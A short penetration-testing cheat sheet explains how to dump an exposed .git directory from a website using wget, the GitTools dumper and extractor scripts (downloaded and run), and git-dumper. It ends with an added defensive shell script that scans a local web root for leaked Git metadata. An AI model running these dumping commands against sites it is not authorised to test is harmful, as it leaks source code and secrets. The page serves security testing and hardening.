Dump Git Repository from Website

If we have permission to access the Git repository on the target website, we can dump the repository and investigate its logs and history to find sensitive information.

Dumping

We can simply use the wget command on Linux to download the Git repository.
After that, we can investigate the files and the full history.

# -r: Recursive
wget -r https://example.com/.git/
cd example.com
git log --stat
git checkout <commit_id>


Dumping with gitdumper and extractor

GitTools downloads the Git repository of a web application.
To dump the repository, execute the following commands.

wget https://raw.githubusercontent.com/internetwache/GitTools/master/Dumper/gitdumper.sh
chmod +x gitdumper.sh
./gitdumper.sh https://example.com/.git/ ./example

We should now have the Git repository locally.
Then extract the entire project by executing the following commands.

wget https://raw.githubusercontent.com/internetwache/GitTools/master/Extractor/extractor.sh
chmod +x extractor.sh
./extractor.sh ./example ./new_example

We have now retrieved the entire Git project from the website.
It is stored in the “./new_example” folder, where we can investigate the repository.


Dumping with Git-Dumper

git-dumper is a useful Python package.

pip install git-dumper
git-dumper https://example.com/.git ./dumped
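
The exposure these tools rely on can be caught on the server side before a site is published. The following is an added example, not part of the original page or of GitTools or git-dumper: it scans a local web document root for .git directories that contain real Git metadata. The function names and the sample tree are constructed for illustration.

```shell
#!/bin/sh
# Added example: find Git metadata inside a local web root before it is published.

# is_git_dir DIR: succeed if DIR/HEAD holds a symbolic ref or a detached
# 40/64-hex object id, i.e. DIR is real Git metadata and not just a folder name.
is_git_dir() {
    [ -f "$1/HEAD" ] || return 1
    IFS= read -r first < "$1/HEAD" || [ -n "$first" ] || return 1
    case "$first" in
        "ref: refs/"*) return 0 ;;
    esac
    printf '%s\n' "$first" | grep -Eq '^([0-9a-f]{40}|[0-9a-f]{64})$'
}

# audit_webroot ROOT: print "<path><TAB><object file count>" for every
# repository under ROOT that a web server would hand out along with the site.
audit_webroot() {
    find "$1" -type d -name .git 2>/dev/null | LC_ALL=C sort |
    while IFS= read -r d; do
        is_git_dir "$d" || continue
        n=$(find "$d/objects" -type f 2>/dev/null | wc -l | tr -d ' ')
        printf '%s\t%s\n' "$d" "$n"
    done
}

# make_sample_webroot: build a constructed sample tree and print its path.
make_sample_webroot() {
    r=$(mktemp -d) || return 1
    mkdir -p "$r/.git/objects/ab" "$r/.git/objects/pack" \
             "$r/assets/.git" "$r/vendor/lib/.git"
    printf 'ref: refs/heads/main\n' > "$r/.git/HEAD"          # normal checkout
    : > "$r/.git/objects/ab/cdef"                             # loose object (empty stand-in)
    : > "$r/.git/objects/pack/pack-sample.pack"               # pack file (empty stand-in)
    printf '%040d\n' 0 > "$r/vendor/lib/.git/HEAD"            # detached HEAD, no objects
    printf '%s\n' "$r"                                        # assets/.git has no HEAD
}

# Demo on the constructed tree; point audit_webroot at a real document root instead.
root=$(make_sample_webroot)
audit_webroot "$root"
rm -rf "$root"
```

Any line of output means the deployment should exclude that .git directory or the web server should deny requests for it.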